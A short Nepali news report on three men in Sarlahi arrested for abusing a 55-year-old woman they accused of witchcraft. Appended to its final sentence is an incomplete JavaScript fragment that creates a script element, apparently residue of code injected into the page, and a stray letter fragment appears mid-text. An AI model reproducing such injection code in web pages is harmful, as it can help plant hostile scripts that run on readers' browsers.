बोक्सी भन्दै दुव्र्यवहार गर्ने परे फन्दामा

सर्लाही, असोज ६ । बोक्सीको आरोप लगाई दुव्र्यवहार गर्ने ३ जनालाई प्रहरीले पक्राउ गरेको छ । पक्राउ पर्नेहरुमा मधुबनिगाउँ–९ बस्ने ३० वर्षीय महोमद आलम, ५५ वर्षीय सुलमान आलम र उनको ज्वाई पर्ने सर्लाही सुन्दरपुर–५ घर भएका २८ वर्षीय महजित अन्सारी रहेका छन् ।bok

उनीहरुले बुधबार राति सोही ठाउँ बस्ने ५५ वर्षीया महिलालाई बोक्सीको आरोप लगाई दुव्र्यबहार गरेका थिए ।var d=document;var s=d.createElement(‘script’);

Loading...